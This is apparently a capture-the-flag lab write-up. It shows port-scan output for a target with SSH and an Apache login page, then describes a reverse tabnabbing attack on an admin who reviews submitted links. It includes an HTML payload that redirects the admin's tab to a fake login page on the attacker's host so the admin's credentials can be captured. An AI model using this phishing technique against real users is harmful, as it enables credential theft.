š Table of Contents
$ sudo rustscan -t 3000 --tries 2 -b 8192 -u 16384 -a 10.10.63.26 -- -sS -sV -sC -oN 10.10.63.26.$(basename $PWD).nmap.txt
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \\ | `| |
| .-. \\| {_} |.-._} } | | .-._} }\\ }/ /\\ \\| |\\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: <https://discord.gg/GFrQsGy> :
: <https://github.com/RustScan/RustScan> :
--------------------------------------
šµ <https://admin.tryhackme.com>
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 16384.
Open 10.10.63.26:22
Open 10.10.63.26:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-07-09 13:33 PDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Initiating Ping Scan at 13:33
Scanning 10.10.63.26 [4 ports]
Completed Ping Scan at 13:33, 0.19s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:33
Completed Parallel DNS resolution of 1 host. at 13:33, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:33
Scanning 10.10.63.26 [2 ports]
Discovered open port 80/tcp on 10.10.63.26
Discovered open port 22/tcp on 10.10.63.26
Completed SYN Stealth Scan at 13:33, 0.19s elapsed (2 total ports)
Initiating Service scan at 13:33
Scanning 2 services on 10.10.63.26
Completed Service scan at 13:33, 6.32s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.63.26.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 4.48s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.62s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Nmap scan report for 10.10.63.26
Host is up, received echo-reply ttl 61 (0.15s latency).
Scanned at 2022-07-09 13:33:20 PDT for 12s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 85:f3:f5:b4:8c:24:1e:ef:6f:28:42:33:7c:2a:22:b4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCmgxcZKHEVEbLHxkmo/bjXYP9qMuWYGmbV0Tl/maOUcfyhPcPPcl2S/RzgKgfWR5MBUit4/iD+LBbKvIqv5NsXAMjUFaC35mXLRrEhUXSP4pfcaWGzKARRJ4C9eUHJ1aT/vhU0ZNnhOW1H8Ig+btzcIqeiQJiKH+iGySyTsXJ3qLOAcQ4qwGKfdpnPtN3MYG7Ba6etdN4J+FVm/tjcUxE76ZKv5IdN+iOeTwBhKhk8lTPf6G8S7X2jx38deqAI6j20UBAnlFdfSjVrbavfzoeyAKODpzmgQ0J/VFWIZGqqMxg/Hq6KChT67DTMxrnfN7wojS2/fItjIpsvjTxlxhiHSvi+57ngJlPYKbiqU4P1nbxSB+eyy0UK44ln6MbLpCcRkvwOP87VOvfII4TfXostq94fYRW8G7oszKGFrucQdYoVTFhKgYveKe0np4eGG/GdPefDbLp5VoNTjs7WBDSxn5jY+0A/IY1/EjuaGlQvpk5IxDbU/mYm9bPeSYdAWgk=
| 256 c2:7b:a9:0c:28:7c:d1:cd:03:23:f4:a8:bc:02:72:4b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBP4j+pg12EElUiOMAVpEuqFCympfDuyyZ7McBGxU9lCp4qMOGKShc96y4656MSnAZu7ofMx9DyO1sDwcfbI3MQ=
| 256 fe:92:00:b4:ee:5e:5a:92:52:90:9f:5e:0b:fd:61:a3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ0X6D1WGTnXedsm4aFXKIEt6iY22msqmq2QvKPW3VXM
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 12.30 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
| Ports | Service | Notes |
|---|---|---|
| 22/tcp | SSH | OpenSSH 8.2p1 |
| 80/tcp | HTTP | Apache 2.4.41 |
Weāve found a login and registration page. Weāve also found a form submission that allows us to submit links that the āadminā will then āmanuallyā click on and review. So we can potentially steal credentials or reset the adminās password.
After some time and research and much prodding from the Twitch chat we started finding that we can execute a technique called tab napping in which we can redirect the location of a ānew tabā that a victim has visited and cause them to visit a malicious page we control. On this malicious page, the admin was prompted to login, and because it was our malicious phishing site (that looked like the real thing) the admin entered their credentials. We can see them come in over the wire in a Wireshark tcpdump.
The setup for this attack looked like the following:
We read through the Tab Napping / Nabbing HackTricks notes to ensure we had all the prerequisites to perform the attack.
<!DOCTYPE html>
<html>
<body>
<script>window.opener.location='<http://10.13.14.1/admin/login.php>';</script>
</body>
</html>
We also set up a fake admin login page located in an admin subfolder named login.php:
